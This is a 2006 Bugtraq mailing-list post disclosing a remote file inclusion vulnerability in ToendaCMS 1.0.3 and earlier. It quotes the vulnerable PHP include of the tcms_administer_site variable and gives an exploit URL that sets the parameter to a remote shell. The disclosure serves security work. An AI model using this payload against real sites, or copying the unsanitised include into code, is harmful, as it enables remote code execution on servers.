Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include

From: h4ck3riran () yahoo com
Date: 20 Aug 2006 07:52:31 -0000
****************************************************
               Iranians Are The Bests

****************************************************
ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include
Descriptions
# Script.............. : ToendaCMS
# Discovered By.... : You_You
# Risk : High 
# Class..............  : Remote
# Special Thanx To All Aria-Security's Administrators



-----------------------------------------------------------------------------------


Source : 
include($tcms_administer_site.'/tcms_global/database.php')


Exploit :
http://www.site.com/path/tcms_administer_site=SHELL
Previous By Date Next
Previous By Thread Next

Current thread: